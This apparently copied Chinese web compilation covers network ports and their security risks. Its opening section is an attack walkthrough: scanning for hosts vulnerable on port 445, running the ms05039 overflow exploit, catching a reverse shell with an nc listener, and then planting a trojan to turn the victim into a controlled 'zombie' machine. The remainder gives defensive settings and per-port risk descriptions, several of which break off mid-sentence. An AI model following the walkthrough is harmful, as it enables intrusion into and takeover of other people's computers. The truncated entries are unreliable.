一些端口知识---网络收集

@echo off    查找指定端口
time /t >>445.log
netstat -n -p tcp |find ":445">>445.log
notepad 445.log
exit


第一步，我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到！比如SUPERSCAN这个端口扫描工具。
第二步，假设现在我们已经得到一台存在445端口漏洞的主机，那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击：
F:\445>ms05039 目标IP 本地IP 1234
。。。 。。。
。。。 。。。
F:\445>nc.exe -vv -l -p 1234
。。。 。。。
。。。 。。。
成功的话，就会返回一个shell，然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他，然后运行，这样得到一只肉鸡的CDMSHELL了。
防范：
方法一：打开Windows 2000系统的开始菜单，选中“设置”项下面的“网络和拨号连接”图标，并用鼠标右键单击之，从其后的快捷菜单中，单击“浏览”命令；
在接着出现的窗口中，右击“Internet连接”图标，选中“属性”选项，弹出Internet连接属性窗口；
打开“常规”标签页面，将其中的“Internet协议(TCP/IP)”项选中，然后再单击一下“属性”按钮，打开Internet协议(TCP/IP)属性设置页面；
继续单击该页面中的“高级”按钮，打开高级TCP/IP设置窗口，选中其中的“选项”标签，并在该标签页面的“可选的设置”项中，将“TCP/IP筛选”选中，再单击一下对应的“属性”按钮，打开TCP/IP筛选的设置口；
由 于 445端口属于一种TCP端口，你可以在对应“TCP端口”的设置项处，将“只允许”项选中，激活下面的“添加”按钮，单击该按钮，在其后打开的“添加 筛选器”窗口中，将必须用到的几个服务端口号码，都添加进来，而将用不到的445端口号码排除在外，设置完毕后，单击“确定”按钮，就可以让设置生效了。
方法二：
开始运行里输入regedit确定  
找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口右键建立一个名为SMBDeviceEnabled 类型为REG_DWORD键值为 0这样就ok了  

在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如 Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。
关闭端口
比如在Windows 2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。接着在打开的服务窗口中找到并双击 “Simple Mail Transfer Protocol （SMTP）”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。
开启端口
如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，
提示：在Windows 98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。
常见网络端口
21端口
端口说明：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务，FTP服务主要是为了在两台计算机之间实现文件的上传与下载，一台计算机作为FTP客户端，另一台计算机作为FTP服务器，可以采用匿名（anonymous）登录和授权用户名与密码登录两种方式登录 FTP服务器。目前，通过FTP服务来实现文件的传输是互联网上上传、下载文件最主要的方法。另外，还有一个20端口是用于FTP数据传输的默认端口号。


17
接上

在Windows中可以通过Internet信息服务（IIS）来提供FTP连接和管理，也可以单独安装FTP服务器软件来实现FTP功能，比如常见的FTP Serv-U。
操作建议：因为有的FTP服务器可以通过匿名登录，所以常常会被黑.客利用。另外，21端口还会被一些木马利用，比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。如果不架设FTP服务器，建议关闭21端口。
23端口
端口说明：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。同样需要设置客户端和服务器端，开启 Telnet服务的客户端就可以登录远程Telnet服务器，采用授权用户名和密码登录。登录之后，允许用户使用命令提示符窗口进行相应的操作。在 Windows中可以在命令提示符窗口中，键入“Telnet”命令来使用Telnet远程登录。
操作建议：利用Telnet服务，黑.客可以搜索远程登录Unix的服务，扫描操作系统的类型。而且在Windows 2000中Telnet服务存在多个严重的漏洞，比如提升权限、拒绝服务等，可以让远程服务器崩溃。Telnet服务的23端口也是TTS（Tiny Telnet Server）木马的缺省端口。所以，建议关闭23端口。
25端口
端口说明：25端口为SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。比如我们在使用电子邮件客户端程序的时候，在创建账户时会要求输入SMTP服务器地址，该服务器地址默认情况下使用的就是 25端口 端口漏洞：
1. 利用25端口，黑.客可以寻找SMTP服务器，用来转发垃圾邮件。
2. 25端口被很多木马程序所开放，比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、 WinPC、WinSpy等等。拿WinSpy来说，通过开放25端口，可以监视计算机正在运行的所有窗口和模块。
操作建议：如果不是要架设SMTP邮件服务器，可以将该端口关闭。
53端口


端口说明：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析，DNS服务在NT系统中使用的最为广泛。通过DNS服务器可以实现域名与IP地址之间的转换，只要记住域名就可以快速访问网站。
端口漏洞：如果开放DNS服务，黑.客可以通过分析DNS服务器而直接获取Web服务器等主机的IP地址，再利用53端口突破某些不稳定的防火墙，从而实施攻击。近日，美国一家公司也公布了10个最易遭黑.客攻击的漏洞，其中第一位的就是DNS服务器的BIND漏洞。
操作建议：如果当前的计算机不是用于提供域名解析服务，建议关闭该端口。
67、68端口
端口说明：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和 Bootstrap Protocol Client（引导程序协议客户端）开放的端口。Bootp服务是一种产生于早期Unix的远程启动协议，我们现在经常用到的DHCP服务就是从Bootp服务扩展而来的。通过Bootp服务可以为局域网中的计算机动态分配IP地址，而不需要每个用户去设置静态IP 地址。
端口漏洞：如果开放Bootp服务，常常会被黑.客利用分配的一个IP地址作为局部路由器通过“中间人”（man-in-middle）方式进行攻击。
操作建议：建议关闭该端口。
端口说明：69端口是为TFTP（Trival File Tranfer Protocol，次要文件传输协议）服务开放的，TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。不过与FTP相比，TFTP不具有复杂的交互存取接口和认证控制，该服务适用于不需要复杂交换环境的客户端和服务器之间进行数据传输。
端口漏洞：很多服务器和Bootp服务一起提供TFTP服务，主要用于从系统下载启动代码。可是，因为TFTP服务可以在系统中写入文件，而且黑.客还可以



79端口
端口说明：79端口是为Finger服务开放的，主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。比如要显示远程计算机www.abc.com上的user01用户的信息，可以在命令行中键入 “finger[email protected]”即可。
端口漏洞：一般黑.客要攻击对方的计算机，都是通过相应的端口扫描工具来获得相关信息，比如使用“流光”就可以利用79端口来扫描远程计算机操作系统版本，获得用户信息，还能探测已知的缓冲区溢出错误。这样，就容易遭遇到黑.客的攻击。而且，79端口还被Firehotcker木马作为默认的端口。
操作建议：建议关闭该端口。
80端口
端口说明：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的，这是上网冲浪使用最多的协议，主要用于在 WWW（World Wide Web，万维网）服务上传输信息的协议。我们可以通过HTTP地址加“:80”（即常说的“网址”）来访问网站的，比如 http://www.cce.com.cn:80，因为浏览网页服务默认的端口号是80，所以只要输入网址，不用输入“:80”。
端口漏洞：有些木马程序可以利用80端口来攻击计算机的，比如Executor、RingZero等。
操作建议：为了能正常上网冲浪，我们必须开启80端口。
99端口
端口说明：99端口是用于一个名为“Metagram Relay”（亚对策延时）的服务，该服务比较少见，一般是用不到的。
端口漏洞：虽然“Metagram Relay”服务不常用，可是Hidden Port、NCx99等木马程序会利用该端口，比如在 Windows 2000中，NCx99可以把cmd．exe程序绑定到99端口，这样用Telnet就可以连接到服务器，随意添加用户、更改权限。
操作建议：建议关闭该端口。
★109、110端口
端口说明：109端口是为POP2（Post Office Protocol Version 2，邮局协议2）服务开放的，110端口是为POP3（邮件协议3）服务开放的，POP2、POP3都是主要用于接收邮件的，目前POP3使用的比较多，许多服务器都同时支持POP2和POP3。客户端可以使用 POP3协议来访问服务端的邮件服务，如今ISP的绝大多数邮件服务器都是使用该协议。在使用电子邮件客户端程序的时候，会要求输入POP3服务器地址，默认情况下使用的就是110端口 端口漏洞：POP2、POP3在提供邮件接收服务的同时，也出现了不少的漏洞。单单POP3服务在用户名和密码交换缓冲区溢出的漏洞就不少于20个，比如WebEasyMail POP3 Server合法用户名信息泄露漏洞，通过该漏洞远程攻击者可以验证用户账户的存在。另外，110端口也被ProMail trojan等木马程序所利用，通过110端口可以窃取POP账号用户名和密码。
操作建议：如果是执行邮件服务器，可以打开该端口。
★111端口
端口说明：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。常见的RPC服务有rpc．mountd、NFS、rpc．statd、rpc．csmd、 rpc．ttybd、amd等等。在Microsoft的Windows中，同样也有RPC服务。
端口漏洞：SUN RPC有一个比较大漏洞，就是在多个RPC服务时xdr＿array函数存在远程缓冲溢出漏洞，通过该漏洞允许攻击者传递超
113端口
端口说明：113端口主要用于Windows的“Authentication Service”（验证服务），一般与网络连接的计算机都运行该服务，主要用于验证TCP连接的用户，通过该服务可以获得连接计算机的信息。在Windows 2000/2003 Server中，还有专门的IAS组件，通过该组件可以方便远程访问中进行身份验证以及策略管理。
端口漏洞：113端口虽然可以方便身份验证，但是也常常被作为FTP、POP、SMTP、 IMAP以及IRC等网络服务的记录器，这样会被相应的木马程序所利用，比如基于IRC聊天室控制的木马。另外，113端口还是 Invisible Identd Deamon、Kazimas等木马默认开放的端口。